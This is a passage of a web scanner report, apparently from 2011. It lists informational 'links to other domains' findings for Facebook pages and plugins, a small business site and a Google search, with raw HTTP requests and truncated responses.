<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.68. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/mobile/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/8gX9xr8NfW0.png
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://www.microsoft.com/windowsphone

Request

Response

20.69. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/pages/create.php?ref_type=sitefooter

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<h2 class="uiHeaderTitle"><img class="uiHeaderImage img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif" alt="" width="15" height="15" />Create a Page</h2>
...[SNIP]...

20.70. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/NBp6zLvqcE_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/qhCGMtA-DY_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Lw9gkzA7aII.css

Request

Response

20.71. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80

The response contains the following link to another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css

Request

Response

20.72. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

20.73. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ed0912f1adcec%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/50196_55311985224_3062_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/NBp6zLvqcE_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/qhCGMtA-DY_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Lw9gkzA7aII.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js

Request

GET /plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ed0912f1adcec%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

20.74. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/terms.php?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.75. http://www.fastteks.com/TechSolutions/Contact-Us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/Contact-Us.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443

The response contains the following links to other domains:

http://www.352media.com/
http://www.352media.com/webapplication.aspx

Request

GET /TechSolutions/Contact-Us.aspx?id=443 HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Services.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:43 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 125293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<br /><a href="http://www.352media.com/webapplication.aspx" target="_blank">Web Application Development</a> by <a href="http://www.352media.com" target="_blank">Web Design Company</a>
...[SNIP]...

20.76. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla%3Aen-US%3Aunofficial&q=%22ArgumentOutOfRangeException%22+exploit&aq=f&aqi=&aql=&oq=

The response contains the following links to other domains:

http://cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html
http://cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html
http://mikehofer.blogspot.com/2007/07/parameter-validation-framework.html
http://msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v=vs.85).aspx
http://raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/
http://reflector.webtropy.com/default.aspx/Net/Net/3@5@50727@3053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure@cs/1/MemoryPressure@cs
http://webcache.googleusercontent.com/search?q=cache:-y47Wab7JbAJ:reflector.webtropy.com/default.aspx/Net/Net/3%405%4050727%403053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure%40cs/1/MemoryPressure%40cs+%22ArgumentOutOfRangeException%22+exploit&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:2QH6_aQ15LYJ:www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html+%22ArgumentOutOfRangeException%22+exploit&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6BkuugxiAe0J:msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v%3Dvs.85).aspx+%22ArgumentOutOfRangeException%22+exploit&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6MrK-KHcjs0J:www.ffxiscripting.com/viewtopic.php%3Fp%3D31019+%22ArgumentOutOfRangeException%22+exploit&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6uVjn3WcJ4UJ:raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/+%22ArgumentOutOfRangeException%22+exploit&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FP2V-312bG4J:cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html+%22ArgumentOutOfRangeException%22+exploit&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mvzPMW8Q5ScJ:www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html+%22ArgumentOutOfRangeException%22+exploit&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nniDTeL_5VAJ:mikehofer.blogspot.com/2007/07/parameter-validation-framework.html+%22ArgumentOutOfRangeException%22+exploit&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:q0PrvCtmHjoJ:cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html+%22ArgumentOutOfRangeException%22+exploit&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rr93tRmoz3EJ:www.codeproject.com/KB/edit/AvalonEdit.aspx%3Fmsg%3D3466323+%22ArgumentOutOfRangeException%22+exploit&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.codeproject.com/KB/edit/AvalonEdit.aspx?msg=3466323
http://www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html
http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/250645-uco-projects-thread-conquer-exe-itemtype-dat-5162-a-26.html
http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html
http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/69124-speed-zoom-hack-non-dc-always-updated-13.html
http://www.elitepvpers.com/forum/shaiya-hacks-bots-cheats-exploits/432469-pre-release-shaiya-packet-bot-lilprohacker.html
http://www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html
http://www.ffxiscripting.com/viewtopic.php?p=31019
http://www.youtube.com/results?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla:en-US:unofficial&q=%22ArgumentOutOfRangeException%22+exploit&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla%3Aen-US%3Aunofficial&q=%22ArgumentOutOfRangeException%22+exploit&aq=f&aqi=&aql=&oq= HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=%22ArgumentOutOfRangeException%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 79275

<!doctype html><head><title>"ArgumentOutOfRangeException" exploit - Google Search</title><script>window.google={kEI:"2RQmTu2mM6mp0AHquKm2Cg",kEXPI:"17259,28505,28936,29859,30316,30465,30727,
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla:en-US:unofficial&q=%22ArgumentOutOfRangeException%22+exploit&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHXki7xh-5SC9iP4xJmq_Gg6dijKw','','0CBkQFjAA')">RC4 encryption code snippet in VB5/VB6, C#, C++ .. The Exploitant</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6uVjn3WcJ4UJ:raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/+%22ArgumentOutOfRangeException%22+exploit&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNF6pahSWAKTkeZKFqajbk4Z9iPO9Q','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html" class=l onmousedown="return rwt(this,'','','','2','AFQjCNE7ElrBe8FkCjvsmIpzpxZuyH9_Qw','','0CB0QFjAB')">Angelbot 1.2.6 (Free) - Page 2</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2QH6_aQ15LYJ:www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html+%22ArgumentOutOfRangeException%22+exploit&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNH2426mmZB25FMarLgyy1kOSs6Lzg','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<div class="fc"><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html" onmousedown="return rwt(this,'','','','2','AFQjCNF2pA3LRcqrlN3sXhFnAau2SBigcw','','0CCAQrAIoADAB')">CO Memory Tool... - Page 3</a>
